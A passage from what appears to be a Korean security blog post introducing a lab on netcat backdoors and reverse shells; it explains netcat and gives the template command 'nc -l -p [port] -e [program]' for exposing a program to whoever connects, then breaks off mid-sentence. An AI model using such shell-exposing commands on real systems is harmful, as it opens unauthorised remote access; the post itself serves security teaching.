보안 이론/웹 보안
2022. 9. 6.
Netcat을 이용한 백도어와 Reverse Shell 실습
netcat이라는 도구를 이용해서 Attacker와 Victim이 연결되는 방식을 알아보고 실습해보았다. Netcat nc라고도 불리는 netcat은 TCP나 UDP를 사용하는 네트워크 연결에서 데이터를 읽고 쓰는 유틸리티이다. 명령어가 백엔드로 설계되어 다른 프로그램이나 스크립트에 의해 쉽게 구동될 수 있어 해킹에서도 많이 이용된다. 우리는 Netcat을 이용한 두가지 명령어로 백도어와 Reverse Shell을 실습해 볼 것이다. nc -l -p [포트번호] -e [프로그램] // 대기 nc [ip주소] [포트] // 접속 -l : 다른 사용자가 접속할 때까지 listen 상태로 기다린다. -p [포트번호] : 해당 포트번호를 열겠다. -e [프로그램] : 바이너리의 권한을 제공한다는 것으로 후술된 ..
